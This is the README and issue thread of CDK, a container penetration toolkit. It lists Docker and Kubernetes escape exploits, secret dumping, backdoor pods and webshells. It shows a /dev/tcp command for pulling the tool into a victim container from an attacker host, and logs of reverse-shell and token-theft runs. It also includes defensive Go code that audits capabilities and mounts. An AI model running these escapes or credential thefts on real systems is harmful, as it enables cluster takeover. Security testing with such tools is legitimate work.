CDK - Zero Dependency Container Penetration Toolkit

Legal Disclaimer

Usage of CDK for attacking targets without prior mutual consent is illegal. CDK is for security testing purposes only.

Overview

CDK is an open-source container penetration toolkit, designed to offer stable exploitation inside different slimmed-down containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs, and helps you escape the container and take over the K8s cluster easily.

Installation/Delivery

Download the latest release from https://github.com/cdk-team/CDK/releases/

Drop the executable file into the target container and start testing.

TIPS: Deliver CDK into the target container in real-world penetration testing

If you have an exploit that can upload a file, you can upload the CDK binary directly.

If you have an RCE exploit but the target container has no curl or wget, you can deliver CDK as follows:

  1. First, host the CDK binary on a machine of yours with a public IP (on your host):

     nc -lvp 999 < cdk

  2. Inside the victim container, execute:

     cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
     chmod a+x cdk

Usage

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk auto-escape <cmd>
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Auto Escape:
  cdk auto-escape <cmd>                     Escape container in different ways then let target execute <cmd>.

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <data>            Make request to K8s api-server.
  ucurl (get|post) <socket> <path> <data>   Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.

Features

CDK has three modules:

  1. Evaluate: gather information inside the container to find potential weaknesses.
  2. Exploit: container escaping, persistence and lateral movement.
  3. Tool: network tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.

Evaluate Module

Usage

cdk evaluate [--full]

This command runs the scripts below without the local file scan; pass --full to enable everything, including the file scan.

Tactics                Script
Information Gathering  OS Basic Info
Information Gathering  Available Capabilities
Information Gathering  Available Linux Commands
Information Gathering  Mounts
Information Gathering  Net Namespace
Information Gathering  Sensitive ENV
Information Gathering  Sensitive Process
Information Gathering  Sensitive Local Files
Information Gathering  Kube-proxy Route Localnet (CVE-2020-8558)
Discovery              K8s Api-server Info
Discovery              K8s Service-account Info
Discovery              Cloud Provider Metadata API
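As an added example (not code from CDK or this README), the Go program below does what the evaluate module's Available Capabilities script reports, from the defender's side: it decodes the CapEff hex mask that /proc/<pid>/status prints (the same CapInh/CapPrm/CapEff/CapBnd/CapAmb lines visible in the issue log further down this page) into capability names, then flags the capabilities the exploit table's escapes depend on and anything beyond Docker's default set. The Docker default set and the choice of escape-relevant capabilities are my assumptions; the status excerpt is constructed.

```go
package main

import (
	"bufio"
	"fmt"
	"strconv"
	"strings"
)

// capNames maps Linux capability bit numbers to names (linux/capability.h).
var capNames = map[uint]string{
	0: "CAP_CHOWN", 1: "CAP_DAC_OVERRIDE", 2: "CAP_DAC_READ_SEARCH", 3: "CAP_FOWNER", 4: "CAP_FSETID",
	5: "CAP_KILL", 6: "CAP_SETGID", 7: "CAP_SETUID", 8: "CAP_SETPCAP", 9: "CAP_LINUX_IMMUTABLE",
	10: "CAP_NET_BIND_SERVICE", 11: "CAP_NET_BROADCAST", 12: "CAP_NET_ADMIN", 13: "CAP_NET_RAW",
	14: "CAP_IPC_LOCK", 15: "CAP_IPC_OWNER", 16: "CAP_SYS_MODULE", 17: "CAP_SYS_RAWIO",
	18: "CAP_SYS_CHROOT", 19: "CAP_SYS_PTRACE", 20: "CAP_SYS_PACCT", 21: "CAP_SYS_ADMIN",
	22: "CAP_SYS_BOOT", 23: "CAP_SYS_NICE", 24: "CAP_SYS_RESOURCE", 25: "CAP_SYS_TIME",
	26: "CAP_SYS_TTY_CONFIG", 27: "CAP_MKNOD", 28: "CAP_LEASE", 29: "CAP_AUDIT_WRITE",
	30: "CAP_AUDIT_CONTROL", 31: "CAP_SETFCAP", 32: "CAP_MAC_OVERRIDE", 33: "CAP_MAC_ADMIN",
	34: "CAP_SYSLOG", 35: "CAP_WAKE_ALARM", 36: "CAP_BLOCK_SUSPEND", 37: "CAP_AUDIT_READ",
	38: "CAP_PERFMON", 39: "CAP_BPF", 40: "CAP_CHECKPOINT_RESTORE",
}

// dockerDefault is Docker's default capability set (assumption from Docker's docs, not from this page).
var dockerDefault = map[string]bool{
	"CAP_CHOWN": true, "CAP_DAC_OVERRIDE": true, "CAP_FSETID": true, "CAP_FOWNER": true, "CAP_MKNOD": true,
	"CAP_NET_RAW": true, "CAP_SETGID": true, "CAP_SETUID": true, "CAP_SETFCAP": true, "CAP_SETPCAP": true,
	"CAP_NET_BIND_SERVICE": true, "CAP_SYS_CHROOT": true, "CAP_KILL": true, "CAP_AUDIT_WRITE": true,
}

// riskyCaps: what this page's capability checks look for (cap-dac-read-search, check-ptrace, the
// CAP_SYS_MODULE evaluate check) plus CAP_SYS_ADMIN, which the cgroup/device mount escapes need.
var riskyCaps = map[string]bool{
	"CAP_DAC_READ_SEARCH": true, "CAP_SYS_MODULE": true, "CAP_SYS_PTRACE": true, "CAP_SYS_ADMIN": true,
}

// DecodeCapMask turns a hex mask such as "00000000a80425fb" into names ordered by bit number.
func DecodeCapMask(hexMask string) ([]string, error) {
	mask, err := strconv.ParseUint(strings.TrimSpace(hexMask), 16, 64)
	if err != nil {
		return nil, fmt.Errorf("bad capability mask %q: %w", hexMask, err)
	}
	if mask>>41 != 0 { // newer than this table: refuse rather than mislabel
		return nil, fmt.Errorf("mask %q has bits above CAP_CHECKPOINT_RESTORE", hexMask)
	}
	var names []string
	for bit := uint(0); bit <= 40; bit++ {
		if mask&(1<<bit) != 0 {
			names = append(names, capNames[bit])
		}
	}
	return names, nil
}

type CapReport struct {
	Effective []string // everything in CapEff
	Risky     []string // members of riskyCaps, in bit order
	BeyondDef []string // capabilities outside Docker's default set
}

// AuditCaps finds the CapEff line in /proc/<pid>/status text and decodes it.
func AuditCaps(status string) (CapReport, error) {
	capEff := ""
	for sc := bufio.NewScanner(strings.NewReader(status)); sc.Scan(); {
		if kv := strings.SplitN(sc.Text(), ":", 2); len(kv) == 2 && kv[0] == "CapEff" {
			capEff = strings.TrimSpace(kv[1])
		}
	}
	if capEff == "" {
		return CapReport{}, fmt.Errorf("no CapEff line in status text")
	}
	names, err := DecodeCapMask(capEff)
	if err != nil {
		return CapReport{}, err
	}
	rep := CapReport{Effective: names}
	for _, n := range names {
		if riskyCaps[n] {
			rep.Risky = append(rep.Risky, n)
		}
		if !dockerDefault[n] {
			rep.BeyondDef = append(rep.BeyondDef, n)
		}
	}
	return rep, nil
}

// sampleStatus is a constructed /proc/self/status excerpt (full 4.x bounding set, as in the issue log below).
const sampleStatus = "Name:\tcdk\nCapInh:\t0000000000000000\nCapPrm:\t0000003fffffffff\n" +
	"CapEff:\t0000003fffffffff\nCapBnd:\t0000003fffffffff\nCapAmb:\t0000000000000000\n"
func main() {
	rep, err := AuditCaps(sampleStatus)
	fmt.Printf("effective=%d beyondDefault=%v risky=%v err=%v\n", len(rep.Effective), rep.BeyondDef, rep.Risky, err)
}
```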

Exploit Module

List all available exploits:

cdk run --list

Run targeted exploit:

cdk run <exploit> [options]

Tactic                Technique                                                    CDK Exploit Name
Escaping              docker-runc CVE-2019-5736                                    runc-pwn
Escaping              containerd-shim CVE-2020-15257                               shim-pwn
Escaping              docker.sock PoC (DIND attack)                                docker-sock-check
Escaping              docker.sock RCE                                              docker-sock-pwn
Escaping              Docker API (2375) RCE                                        docker-api-pwn
Escaping              Device Mount Escaping                                        mount-disk
Escaping              LXCFS Escaping                                               lxcfs-rw
Escaping              Cgroups Escaping                                             mount-cgroup
Escaping              Procfs Escaping                                              mount-procfs
Escaping              Ptrace Escaping PoC                                          check-ptrace
Escaping              Rewrite Cgroup (devices.allow)                               rewrite-cgroup-devices
Escaping              Read arbitrary file from host system (CAP_DAC_READ_SEARCH)   cap-dac-read-search
Discovery             K8s Component Probe                                          service-probe
Discovery             Dump Istio Sidecar Meta                                      istio-check
Discovery             Dump K8s Pod Security Policies                               k8s-psp-dump
Remote Control        Reverse Shell                                                reverse-shell
Credential Access     Registry BruteForce                                          registry-brute
Credential Access     Access Key Scanning                                          ak-leakage
Credential Access     Dump K8s Secrets                                             k8s-secret-dump
Credential Access     Dump K8s Config                                              k8s-configmap-dump
Privilege Escalation  K8s RBAC Bypass                                              k8s-get-sa-token
Persistence           Deploy WebShell                                              webshell-deploy
Persistence           Deploy Backdoor Pod                                          k8s-backdoor-daemonset
Persistence           Deploy Shadow K8s api-server                                 k8s-shadow-apiserver
Persistence           K8s MITM Attack (CVE-2020-8554)                              k8s-mitm-clusterip
Persistence           Deploy K8s CronJob                                           k8s-cronjob

Note about Thin: the thin release is prepared for short-lived container shells such as serverless functions. We add build tags in the source code and cut a few exploits to make the binary lighter. The 2MB file contains 90% of CDK's functions; you can also pick the exploits you need from the CDK source code and build your own lightweight binary.

Tool Module

These commands behave like their Linux counterparts, with small differences in the input arguments; see the usage link for details.

cdk nc [options]
cdk ps

Command   Description
nc        TCP Tunnel
ps        Process Information
ifconfig  Network Information
vi        Edit Files
kcurl     Request to K8s api-server
dcurl     Request to Docker HTTP API
ucurl     Request to Docker Unix Socket
rcurl     Request to Docker Registry API
probe     IP/Port Scanning

Release Document

If you want to know how we release a new version, how the thin build is produced, why we provide upx versions, what the differences between the all, normal, thin and upx variants are, and how to pick specific CDK exploits and tools to compile your own release, please check the Release Document.

Developer Docs

Contributing to CDK

First off, thanks for taking the time to contribute!

If you report an issue, propose an idea or submit a PR, your GitHub ID will be listed here.

Bug Reporting

Bugs are tracked as GitHub Issues. Create an issue with the current CDK version, the error message and the environment, and describe the exact steps that reproduce the problem.

Suggesting Enhancements

Enhancement suggestions are tracked as GitHub Discussions. You can publish any thoughts here to discuss with developers directly.

Pull Requests

Fix problems or maintain CDK's quality:

  • Describe the current CDK version, environment, problem and the exact steps that reproduce the problem.
  • Include screenshots or logs of the run before and after your fix.

New feature or exploits:

  • Explain why this enhancement would be useful to other users.
  • Please provide a sustainable environment in which we can review your contribution.
  • Include screenshots showing how the new feature works.
  • If you are committing a new evaluate/exploit script, please add a short doc to your PR message; here is an example.

Events

404StarLink 2.0 - Galaxy


Project CDK is now included in 404Team Starlink Project 2.0. Join the StarLink community to get in touch with CDK dev-team.

BlackHat Asia 2021 Arsenal

HITB SecConf 2021 Amsterdam

WHC 2021 (Butian White Hat Conference, 补天白帽大会)

KCON 2021 Arsenal

Kubernetes community Days 2021

Comments
  • feat(exploit/abuse_unpriv_userns.go): exploit of CVE-2022-0492

    co-operate with PR #40.

    Use the reexec technique to let a multi-threaded program (such as this golang program) run in a different, new namespace.

    Why reexec?

    unshare() cannot be used safely in a multi-threaded program, especially in the current circumstances. Check the comments in the code for more details.

    Signed-off-by: kmahyyg [email protected]

  • Add CAP_DAC_READ_SEARCH escape

    Hi team! First of all, thanks for the project! I'd like to contribute an escape via the CAP_DAC_READ_SEARCH capability, which allows arbitrary file read.

    You'll find documentation to this escape in comments to this PR because I can't edit project Wiki directly.


    Nikita Stupin Advanced Software Technology Lab Huawei

  • Two problems with docker_runc.go in the exploit module

    1. After running ./cdk run runc-pwn "", matching "runc" among the processes hits the process that is running this very command, so the self process is always matched first. I suggest changing the command, for example to ./cdk run rc-pwn

    2. After reading the pids under /proc, the code in the figure below walks the pids once and then exits. It should keep listening until the host runs docker exec again, at which point runc can be found. I suggest wrapping it in another for loop.
  • Problem reproducing CVE-2020-14257

    Problem encountered while reproducing CVE-2020-15257

    I want to reproduce CDK's exploitation of CVE-2020-15257. My docker version is

    $docker version
    Client:
     Version:      18.03.1-ce
     API version:  1.37
     Go version:   go1.9.5
     Git commit:   9ee9f40
     Built:        Thu Apr 26 07:17:20 2018
     OS/Arch:      linux/amd64
     Experimental: false
     Orchestrator: swarm
    
    Server:
     Engine:
      Version:      18.03.1-ce
      API version:  1.37 (minimum version 1.12)
      Go version:   go1.9.5
      Git commit:   9ee9f40
      Built:        Thu Apr 26 07:15:30 2018
      OS/Arch:      linux/amd64
      Experimental: false
    

    The API version is 1.3.7, which is a vulnerable version.

    Run the following commands:

    docker run -itd --name 14257 --net=host ubuntu /bin/bash
    docker cp cdk_linux_amd64 15257:/tmp
    

    Then inside the container:

    ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
    

    Now I want to bounce a shell from the host back to my attacking machine, but the program reports an error; the details are as follows:

    root@ubuntu:/tmp# ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
    2021/06/25 03:01:57 tring to spawn shell to xx.xx.xx.xx:1234
    2021/06/25 03:01:57 try socket: @/containerd-shim/moby/984f085a7c09eac06c5f0dd7318168b50c3438351544de4f6f9a7c1e0f1ef997/shim.sock
    2021/06/25 03:01:57 rpc error response.:
    rpc error: code = Unknown desc = OCI runtime create failed: exec: "runc": executable file not found in $PATH
    2021/06/25 03:01:57 exploit failed.
    

    It looks like runc was not found in the $PATH directories. I installed docker the way the official site describes, never installed runc separately, and never switched the container's underlying runtime. The container runs normally, so runc must be on the system, yet the exploit failed.

    Additional information

    1. What does cdk evaluate --full return? [executed on the host]

    $ ./cdk_linux_amd64 evaluate --full
    
    [Information Gathering - System Info]
    2021/06/24 19:45:23 current dir: /home/xsw/Desktop
    2021/06/24 19:45:23 current user: xsw uid: 1000 gid: 1000 home: /home/xsw
    2021/06/24 19:45:23 hostname: ubuntu
    2021/06/24 19:45:23 debian ubuntu 16.04 kernel: 4.8.0-34-generic
    
    [Information Gathering - Services]
    2021/06/24 19:45:23 sensitive env found:
    	SSH_AUTH_SOCK=/run/user/1000/keyring/ssh
    2021/06/24 19:45:23 service found in process:
    	1873	1814	ibus-engine-sim
    2021/06/24 19:45:23 service found in process:
    	8638	1	dockerd
    2021/06/24 19:45:23 service found in process:
    	8644	8638	docker-containe
    2021/06/24 19:45:23 service found in process:
    	9976	8644	docker-containe
    2021/06/24 19:45:23 service found in process:
    	10501	10470	docker
    2021/06/24 19:45:23 service found in process:
    	12100	11244	docker
    2021/06/24 19:45:23 service found in process:
    	12106	8644	docker-containe
    
    [Information Gathering - Commands and Capabilities]
    2021/06/24 19:45:23 available commands:
    	curl,wget,nc,netcat,docker,find,ps,python,python3,apt,dpkg,ssh,git,vi,capsh,mount,fdisk,gcc,g++,make,base64,python2,python2.7,perl,xterm,sudo
    2021/06/24 19:45:23 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
    	CapInh:	0000000000000000
    	CapPrm:	0000000000000000
    	CapEff:	0000000000000000
    	CapBnd:	0000003fffffffff
    	CapAmb:	0000000000000000
    	Cap decode: 0x0000000000000000 = 
    [*] Maybe you can exploit the Capabilities below:
    
    [Information Gathering - Mounts]
    Device:/dev/sda1 Path:/ Filesystem:ext4 Flags:rw,relatime,errors=remount-ro,data=ordered
    
    [Information Gathering - Net Namespace]
    	host unix-socket found, seems container started with --net=host privilege.
    	found containerd-shim socket in: [@/containerd-shim/moby/7ec0aae020d2b66617d2fc95419ec3928d9c91b111ae639bdddfb24b99bfb98a/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/7ec0aae020d2b66617d2fc95419ec3928d9c91b111ae639bdddfb24b99bfb98a/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/7ec0aae020d2b66617d2fc95419ec3928d9c91b111ae639bdddfb24b99bfb98a/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
    
    [Information Gathering - Sysctl Variables]
    2021/06/24 19:45:23 net.ipv4.conf.all.route_localnet = 0
    
    [Discovery - K8s API Server]
    2021/06/24 19:45:23 checking if api-server allows system:anonymous request.
    err found while searching local K8s apiserver addr.:
    err: cannot find kubernetes api host in ENV
    	api-server forbids anonymous request.
    	response:
    
    [Discovery - K8s Service Account]
    load K8s service account token error.:
    open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory
    
    [Discovery - Cloud Provider Metadata API]
    2021/06/24 19:45:24 failed to dial Alibaba Cloud API.
    2021/06/24 19:45:25 failed to dial Azure API.
    2021/06/24 19:45:25 failed to dial Google Cloud API.
    2021/06/24 19:45:26 failed to dial Tencent Cloud API.
    2021/06/24 19:45:27 failed to dial OpenStack API.
    2021/06/24 19:45:27 failed to dial Amazon Web Services (AWS) API.
    2021/06/24 19:45:28 failed to dial ucloud API.
    
    [Information Gathering - Sensitive Files]
    	/.bashrc - /etc/skel/.bashrc
    	/docker.sock - /etc/systemd/system/sockets.target.wants/docker.socket
    	/.bash_history - /home/xsw/.bash_history
    	/.bashrc - /home/xsw/.bashrc
    	.git/ - /home/xsw/metarget/.git/HEAD
    	.git/ - /home/xsw/metarget/.git/branches
    	.git/ - /home/xsw/metarget/.git/config
    	.git/ - /home/xsw/metarget/.git/description
    	.git/ - /home/xsw/metarget/.git/hooks
    	.git/ - /home/xsw/metarget/.git/index
    	.git/ - /home/xsw/metarget/.git/info
    	.git/ - /home/xsw/metarget/.git/logs
    	.git/ - /home/xsw/metarget/.git/objects
    	.git/ - /home/xsw/metarget/.git/packed-refs
    	.git/ - /home/xsw/metarget/.git/refs
    	/docker.sock - /lib/systemd/system/docker.socket
    	/docker.sock - /run/docker.sock
    	/docker.sock - /var/lib/systemd/deb-systemd-helper-enabled/docker.socket.dsh-also
    	/docker.sock - /var/lib/systemd/deb-systemd-helper-enabled/sockets.target.wants/docker.socket
    
    [Information Gathering - ASLR]
    2021/06/24 19:45:49 /proc/sys/kernel/randomize_va_space file content: 2
    2021/06/24 19:45:49 ASLR is enabled.
    
    [Information Gathering - Cgroups]
    2021/06/24 19:45:49 /proc/1/cgroup file content:
    	11:pids:/init.scope
    	10:cpuset:/
    	9:hugetlb:/
    	8:memory:/init.scope
    	7:devices:/init.scope
    	6:freezer:/
    	5:cpu,cpuacct:/init.scope
    	4:perf_event:/
    	3:net_cls,net_prio:/
    	2:blkio:/init.scope
    	1:name=systemd:/init.scope
    

    2. Full error message

    root@ubuntu:/tmp# ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
    2021/06/25 03:01:57 tring to spawn shell to xx.xx.xx.xx:1234
    2021/06/25 03:01:57 try socket: @/containerd-shim/moby/984f085a7c09eac06c5f0dd7318168b50c3438351544de4f6f9a7c1e0f1ef997/shim.sock
    2021/06/25 03:01:57 rpc error response.:
    rpc error: code = Unknown desc = OCI runtime create failed: exec: "runc": executable file not found in $PATH
    2021/06/25 03:01:57 exploit failed.
    
  • add kubelet exec

    Exploit: kubelet-exec

    Use the default '10250' port 'kubelet' service to list pods running in the cluster.
    By default, unauthorized access is supported. The token can be entered optionally.

    Uses the kubelet service on the default port 10250 to enumerate the pods running in the cluster; supports executing system commands in a specified pod and echoing the output.
    Unauthenticated access is exploited by default; the token is optional.

    Usage

    ./cdk run kubelet-exec (list|exec) <endpoint>/<namespace>/<pod>/<container> <token>
    

    Example

    ./cdk run kubelet-exec list http://172.16.61.10:10250
    ./cdk run kubelet-exec exec https://172.16.61.10:10250/kube-system/test1/test "ip addr"
    
  • Implement mount-cgroup in Golang style

    feat(exp/mount_cgroup.go): completely fix #35 in golang-style

    This implements the mount-cgroup exploit entirely in Golang.

    Detailed information:

    • Change whole "create-mount-write" process using Golang native Unix API.
    • To avoid conflict, increase length of random string from 3 to 4. Tasks sub-cgroup are also in the same kind of random name.
    • Read mounted filesystem information from /proc/self/mountinfo, instead of /etc/mtab .
    • Due to the limitation of exec.Command, output redirect is implemented in another way: manually get pid and write to cgroups.procs

    Further enhancement:

    • To read the container filesystem path on the host, implement to read superBlockOptions of MountInfo.
    • To implement CVE-2022-0492 in this PR further, I modified EscapeCgroup function, so that it can be re-used for other subsystems.

    Chores:

    • go mod tidy
    • Fix Typo
    • Run a much quicker random string generator
    1b94046 (HEAD -> main, origin/main, origin/HEAD) feat(exp/mount_cgroup.go): completely fix #35 in golang-style
    043d6b6 feat(util/cgroup.go): add superBlockOptions when parsing /proc/self/mountinfo
    4c640ae fix(util/cgroup.go): typo: marjor -> major
    60b44e5 fix(exp/mount-cgroup): fix #35 in shell-style in a simple way
    ecfadba optimize(exp/mount-cgroup): update build constraint, cgroup is linux only
    ef056df optimize(util/common.go): Quicker Random String Generator
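The Mounts script of the evaluate module and the PR above both read /proc/self/mountinfo. As an added example (not the PR's code or CDK's), here is a Go parser for that format that locates the "-" separator correctly despite the variable number of optional fields, reads the super-block options the PR mentions, and flags the mount configurations the exploit table targets (a writable cgroup hierarchy, a writable lxcfs, a bind-mounted docker.sock). The sample mountinfo lines are constructed, and the finding categories are my choice.

```go
package main

import (
	"fmt"
	"strings"
)

// MountInfo holds the fields of one /proc/self/mountinfo line that matter here.
type MountInfo struct {
	Root       string   // field 4: path inside the filesystem that forms this mount's root
	MountPoint string   // field 5: where it appears in this mount namespace
	Options    []string // field 6: per-mount options such as rw,nosuid
	FSType     string   // first field after the "-" separator
	Source     string   // second field after "-"
	SuperOpts  []string // third field after "-": super-block options (e.g. overlay upperdir)
}

// ParseMountInfo parses mountinfo text. The optional fields before "-" vary in
// number, so the separator is located by search instead of assumed at index 6.
func ParseMountInfo(text string) ([]MountInfo, error) {
	var mounts []MountInfo
	for _, line := range strings.Split(strings.TrimSpace(text), "\n") {
		f := strings.Fields(line)
		sep := -1
		for i, v := range f {
			if v == "-" {
				sep = i
				break
			}
		}
		if sep < 6 || len(f) < sep+4 {
			return nil, fmt.Errorf("malformed mountinfo line: %q", line)
		}
		mounts = append(mounts, MountInfo{
			Root: f[3], MountPoint: f[4], Options: strings.Split(f[5], ","),
			FSType: f[sep+1], Source: f[sep+2], SuperOpts: strings.Split(f[sep+3], ","),
		})
	}
	return mounts, nil
}

func hasOpt(opts []string, want string) bool {
	for _, o := range opts {
		if o == want {
			return true
		}
	}
	return false
}

// superOpt returns the value of a key=value super-block option, or "" if absent.
func superOpt(m MountInfo, key string) string {
	for _, o := range m.SuperOpts {
		if strings.HasPrefix(o, key+"=") {
			return strings.TrimPrefix(o, key+"=")
		}
	}
	return ""
}

// AuditMounts flags mounts matching the escape techniques in this page's exploit table, in mountinfo order.
func AuditMounts(mounts []MountInfo) []string {
	var findings []string
	for _, m := range mounts {
		switch {
		case m.FSType == "overlay" && m.MountPoint == "/":
			// upperdir is where this container's rootfs lives on the host (the superBlockOptions use from the PR)
			findings = append(findings, "container rootfs upperdir on host: "+superOpt(m, "upperdir"))
		case (m.FSType == "cgroup" || m.FSType == "cgroup2") && hasOpt(m.Options, "rw"):
			// mount-cgroup and rewrite-cgroup-devices need a writable cgroup hierarchy
			findings = append(findings, "writable cgroup mount "+m.MountPoint+" ("+strings.Join(m.SuperOpts, ",")+")")
		case m.FSType == "fuse.lxcfs" && hasOpt(m.Options, "rw"):
			findings = append(findings, "writable lxcfs mount "+m.MountPoint) // lxcfs-rw
		case strings.HasSuffix(m.Root, "docker.sock") || strings.HasSuffix(m.MountPoint, "docker.sock"):
			findings = append(findings, "docker socket bind-mounted at "+m.MountPoint) // docker-sock-check / docker-sock-pwn
		}
	}
	return findings
}

// sampleMountInfo is constructed for this example, not captured from a real container.
const sampleMountInfo = `1 0 0:50 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/LOW,upperdir=/var/lib/docker/overlay2/ID/diff,workdir=/var/lib/docker/overlay2/ID/work
2 1 0:51 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
3 1 0:52 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - tmpfs tmpfs ro,mode=755
4 3 0:26 /docker/ID /sys/fs/cgroup/devices rw,nosuid,nodev,noexec,relatime master:17 - cgroup cgroup rw,devices
5 1 8:1 /var/run/docker.sock /run/docker.sock rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro
6 1 0:60 / /var/lib/lxcfs rw,nosuid,nodev,relatime - fuse.lxcfs lxcfs rw,user_id=0,group_id=0,allow_other
`

func main() {
	mounts, err := ParseMountInfo(sampleMountInfo)
	fmt.Println(AuditMounts(mounts), err)
}
```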
    
  • Add check for `CAP_SYS_MODULE` and `CAP_DAC_READ_SEARCH`

    Hi team,

    1. In this PR I've added an explicit check for CAP_SYS_MODULE (and CAP_DAC_READ_SEARCH as well) at the evaluate step. This way it is clearer for the end user which escape techniques he / she can apply after the evaluate step is completed.
    2. I suggest refactoring check_ptrace.go in a similar way, because technically it just evaluates whether CAP_SYS_PTRACE exists and does not actually escape. So I suppose it should belong to the evaluate step rather than the escape step.
    3. The reason why I didn't implement an actual CAP_SYS_MODULE escape in CDK is that each kernel version and architecture combination requires a kernel module built specifically for it. Given how many kernel versions and architectures are out there, I see several options:
      1. Write detailed instructions on how to build a kernel module for an arbitrary kernel version and architecture and put them in CDK.
      2. Prebuild kernel modules for the most popular distributions (e.g. Ubuntu 20.04), include them in the CDK binary and leave a note on how to build the kernel module for other kernel versions.
    4. What do you think about point (3)? Do you have any ideas on how to integrate a CAP_SYS_MODULE escape into CDK?

    Nikita Stupin Advanced Software Technology Lab Huawei

  • add lxcfs-rw escape

    Add exploitation for the case where lxcfs inside the container is writable

    output:

    /tmp # ./cdk run lxcfs-rw
    2021/01/27 16:30:17 found pod devices.allow path: /kubepods/burstable/pod3453dde3-3ede-11eb-bff3-5254005e6516/8ca73287248fc9f72f6d502db9406edeca5acacd85b466b68d7ad4810e3bf7e5
    2021/01/27 16:30:17 found rw lxcfs mountpoint: /data/monitor/lxcfs
    2021/01/27 16:30:17 found host blockDeviceId Marjor: 253 Minor: 1
    2021/01/27 16:30:17 set all block device accessible success.
    2021/01/27 16:30:17 devices.allow content: a *:* rwm
    2021/01/27 16:30:17 exploit success, run "debugfs -w host_dev".
    

    Exploit result:

  • shim-pwn fails to run

    Tried shim-pwn; running the shim-pwn exp inside the container reported the following error:

    debianxxx(@:):~# ./cdk_linux_amd64 run shim-pwn 10.1.1.1 12346
    2020/12/30 17:36:09 tring to spawn shell to 10.1.1.1:12346
    2020/12/30 17:36:09 try socket: @/containerd-shim/moby/fc3385bd1b56983d7a5fc2997560cc445180cd1130150692171563eed09d8c3d/shim.sock
    2020/12/30 17:36:09 rpc error: rpc error: code = Unknown desc = OCI runtime create failed: JSON specification file config.json not found
    2020/12/30 17:36:09 try socket: @/containerd-shim/moby/b029461e5e5f7dbca3b6fd89414ac06946d5fb73456000edcc2f9fcc6ef9164c/shim.sock
    2020/12/30 17:36:09 rpc error: rpc error: code = Unknown desc = OCI runtime create failed: JSON specification file config.json not found
    2020/12/30 17:36:09 try socket: @/containerd-shim/moby/7a77f96e2061f6d5160167400ae59b20d08229a626ff1ef5bdd9e7458e95741f/shim.sock
    2020/12/30 17:36:09 rpc error: rpc error: code = Unknown desc = OCI runtime create failed: JSON specification file config.json not found
    

    docker version:

    Client:
     Version:           18.06.1-ce
     API version:       1.38
     Go version:        go1.10.3
     Git commit:        e68fc7a
     Built:             Tue Aug 21 17:23:18 2018
     OS/Arch:           linux/amd64
     Experimental:      false
    
    Server:
     Engine:
      Version:          18.06.1-ce
      API version:      1.38 (minimum version 1.12)
      Go version:       go1.10.3
      Git commit:       e68fc7a
      Built:            Tue Aug 21 17:22:21 2018
      OS/Arch:          linux/amd64
      Experimental:     false
    
  • k8s-shadow-apiserver response check is wrong

    Please describe the issue in detail

    When deploying a shadow api server with cdk, the code checks selfLink, but the podlist has no such field. k8s version 1.20.6

    Note: Before submitting an issue, please check whether the CDK you are using is the latest version; some bugs have already been fixed in the latest version.

    2. Please post the full error message, which can be command line output, software error message, screenshots, etc.

    ./cdk run k8s-shadow-apiserver default
    

    Attention, please post the full error message, don't paste only the last line of the error!

  • add etcd get k8s token

    Exploit: etcd-get-k8s-token

    Lists the key/value pairs under /registry/secrets/kube-system/ in the etcd service, extracts plaintext service-account-tokens by regex, sends requests to the K8s API-server service on the default port 6443 to verify the token's validity, and takes over the cluster.

    Iterates over the key/value pairs under the etcd prefix /registry/secrets/kube-system/, extracts plaintext service-account-tokens by regex, sends requests to the K8s api-server service on the default port 6443 to verify token validity, and can go on to take over the cluster.

    Usage

    ./cdk run etcd-get-k8s-token (anonymous|default) <endpoint> <cert> <cert_key> <ca>
    

    Example

    ./cdk run etcd-get-k8s-token anonymous http://172.16.61.10:2379
    ./cdk run etcd-get-k8s-token default
    
  • [Exploit] Implement actual CAP_SYS_MODULE escape in CDK

    From: @nikitastupin in #20

    The reason why I didn't implement actual CAP_SYS_MODULE escape in CDK is because each kernel version and architecture combination requires kernel module built specifically for it. Given how many kernel versions and architectures out there I see several options:

    • To make detailed instructions on how to build kernel module for arbitrary kernel version and architecture and put them to CDK.
    • To prebuilt kernel module for most popular distributions (e.g. Ubuntu 20.04) include them in CDK binary and leave note on how to build kernel module for other kernel versions.

    Great thanks to Nikita.

  • [doc] document about thin version and upx version

    We need a document explaining the differences between the release binaries (memo, to be written soon).

